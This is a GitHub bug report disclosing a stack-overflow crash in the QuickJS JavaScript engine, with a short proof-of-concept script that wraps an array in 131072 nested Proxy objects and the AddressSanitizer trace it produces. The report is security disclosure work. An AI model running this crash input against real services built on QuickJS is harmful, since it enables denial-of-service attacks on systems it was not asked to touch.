Skip to content

AddressSanitizer: stack-overflow #178

New issue
New issue
Closed
Closed
AddressSanitizer: stack-overflow#178
@Ye0nny

Description

@Ye0nny
Ye0nny
opened on Apr 22, 2023

QuickJS Version

Version : 2788d71

platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build

  • Address Sanitizer=On
  • Debug (and Release)

PoC

testcase 

Array . isArray ( [ ] ) ; Array . isArray ( { } ) , Array . isArray ( null ) , Array . isArray ( 0 ) , Array . isArray ( 0.1 ) , Array . isArray ( " " ) , Array . isArray ( void 0 ) , Array . isArray ( new Proxy ( [ ] , { } ) ) , Array . isArray ( new Proxy ( { } , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( [ ] , { } ) , { } ) ) , Array . isArray ( new Proxy ( new Proxy ( { } , { } ) , { } ) ) ; for ( var r = new Proxy ( [ ] , { } ) , y = 0 ; y < 131072 ; y ++ ) r = new Proxy ( r , { } ) ; Array . isArray ( r ) , RangeError ;

// poc.js
for (var r = new Proxy ([],{}) , y = 0 ; y < 131072 ; y ++ ) 
    r = new Proxy (r, {}); 
Array . isArray (r);

Execution steps & Output

The js_proxy_isArray() function and the JS_IsArray() function are calling each other recursively.
infinite loop occurs here.

$ ./qjs poc.js
AddressSanitizer:DEADLYSIGNAL
=================================================================
==2347865==ERROR: AddressSanitizer: stack-overflow on address 0x7ffcfb766fd8 (pc 0x557e466f5b94 bp 0x7ffcfb767110 sp 0x7ffcfb766fd8 T0)
    #0 0x557e466f5b93 in js_proxy_isArray ./quickjs/quickjs.c:45242
    #1 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #2 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #3 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #4 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #5 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    ...
    #491 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #492 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #493 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #494 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250
    #495 0x557e466f5f3f in JS_IsArray ./quickjs/quickjs.c:11975
    #496 0x557e466f5f3f in js_proxy_isArray ./quickjs/quickjs.c:45250

SUMMARY: AddressSanitizer: stack-overflow ./quickjs/quickjs.c:45242 in js_proxy_isArray
==2347865==ABORTING

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions